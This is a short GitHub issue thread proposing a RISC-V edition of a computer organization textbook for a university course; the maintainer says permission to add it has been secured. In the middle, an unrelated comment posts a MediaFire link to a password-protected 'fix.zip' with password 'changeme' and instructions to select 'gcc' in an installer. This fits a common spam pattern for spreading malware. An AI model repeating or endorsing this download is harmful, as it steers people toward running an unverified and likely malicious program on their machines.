### ISSUE TITLE
[Book suggestion] Computer Organization and Design RISC-V Edition: The Hardware/Software Interface: RISC-V Edition

### ISSUE THREAD

**Issue by mikael-ros** [mikael-ros/slumper#90]
ISBN/Link: Not sure

Related course: EITF70

#### Motivation (optional)
These exercises are somewhat independent

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikael-ros** [comment]
Permission has been requested

**Comment by mikael-ros** [comment]
Permission secured. Adding later this week
